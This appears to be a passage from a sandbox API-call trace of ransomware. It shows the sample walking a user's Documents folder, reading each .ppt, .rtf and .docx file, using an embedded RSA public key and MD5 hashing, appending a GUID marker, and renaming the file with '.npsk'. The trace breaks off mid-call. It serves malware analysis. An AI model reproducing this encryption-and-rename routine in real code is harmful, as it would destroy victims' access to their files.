ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xeb4, lpOverlapped=0x0) returned 1 [0216.402] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.402] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.402] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.402] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0216.403] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.403] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.403] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.403] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.403] GetLastError () returned 0x0 [0216.403] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.403] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0216.403] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.403] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.404] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.404] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.404] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xeb4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.404] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.404] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.404] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.404] CloseHandle (hObject=0x61c) returned 1 [0216.405] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\bC__N8aqJQNDm1AKj8.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\bc__n8aqjqndm1akj8.ppt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\bC__N8aqJQNDm1AKj8.ppt.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\bc__n8aqjqndm1akj8.ppt.npsk")) returned 1 [0216.407] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x396d8f60, ftCreationTime.dwHighDateTime=0x1d5e6dd, ftLastAccessTime.dwLowDateTime=0xb0ffc9e0, ftLastAccessTime.dwHighDateTime=0x1d5d859, ftLastWriteTime.dwLowDateTime=0xb0ffc9e0, ftLastWriteTime.dwHighDateTime=0x1d5d859, nFileSizeHigh=0x0, nFileSizeLow=0x15650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="L3qVD2UVF4ROD.rtf", cAlternateFileName="L3QVD2~1.RTF")) returned 1 [0216.407] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\L3qVD2UVF4ROD.rtf") returned=".rtf" [0216.407] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\L3qVD2UVF4ROD.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\l3qvd2uvf4rod.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.408] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=87632) returned 1 [0216.408] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.409] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x1562a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.409] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.411] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x15650, lpOverlapped=0x0) returned 1 [0216.412] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.412] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.412] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.412] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0216.413] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.413] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.413] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.413] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.413] GetLastError () returned 0x0 [0216.413] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.413] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0216.413] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.413] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.413] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.414] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.414] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x15650, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.414] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.414] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.414] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.414] CloseHandle (hObject=0x61c) returned 1 [0216.416] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\L3qVD2UVF4ROD.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\l3qvd2uvf4rod.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\L3qVD2UVF4ROD.rtf.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\l3qvd2uvf4rod.rtf.npsk")) returned 1 [0216.417] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7e6a9ed0, ftCreationTime.dwHighDateTime=0x1d5dd70, ftLastAccessTime.dwLowDateTime=0x1ac016d0, ftLastAccessTime.dwHighDateTime=0x1d5de1a, ftLastWriteTime.dwLowDateTime=0x1ac016d0, ftLastWriteTime.dwHighDateTime=0x1d5de1a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lMexzd9nHZj622T267Je", cAlternateFileName="LMEXZD~1")) returned 1 [0216.417] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0a266e0, ftCreationTime.dwHighDateTime=0x1d5e1b0, ftLastAccessTime.dwLowDateTime=0x9d758200, ftLastAccessTime.dwHighDateTime=0x1d5d9f0, ftLastWriteTime.dwLowDateTime=0x9d758200, ftLastWriteTime.dwHighDateTime=0x1d5d9f0, nFileSizeHigh=0x0, nFileSizeLow=0x15dcc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Nd7 afWsG.docx", cAlternateFileName="ND7AFW~1.DOC")) returned 1 [0216.417] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\Nd7 afWsG.docx") returned=".docx" [0216.417] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\Nd7 afWsG.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\nd7 afwsg.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.418] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=89548) returned 1 [0216.418] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.420] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x15da6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.420] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.421] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x15dcc, lpOverlapped=0x0) returned 1 [0216.422] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.422] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.422] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.422] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0216.423] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.423] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.423] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.423] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.423] GetLastError () returned 0x0 [0216.423] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.423] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0216.423] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.423] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.423] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.424] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0216.424] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x15dcc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.424] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.424] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.424] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.425] CloseHandle (hObject=0x61c) returned 1 [0216.426] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\Nd7 afWsG.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\nd7 afwsg.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\Nd7 afWsG.docx.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\nd7 afwsg.docx.npsk")) returned 1 [0216.427] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfba34520, ftCreationTime.dwHighDateTime=0x1d5d88c, ftLastAccessTime.dwLowDateTime=0x84098ec0, ftLastAccessTime.dwHighDateTime=0x1d5e74b, ftLastWriteTime.dwLowDateTime=0x84098ec0, ftLastWriteTime.dwHighDateTime=0x1d5e74b, nFileSizeHigh=0x0, nFileSizeLow=0xe8bd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tGmp.rtf", cAlternateFileName="")) returned 1 [0216.427] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\tGmp.rtf") returned=".rtf" [0216.427] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\tGmp.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\tgmp.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.428] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=59581) returned 1 [0216.428] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.430] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xe897, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.430] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.433] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xe8bd, lpOverlapped=0x0) returned 1 [0216.434] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.434] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.434] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.434] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0216.435] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.435] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.435] CryptGetHashParam (in: 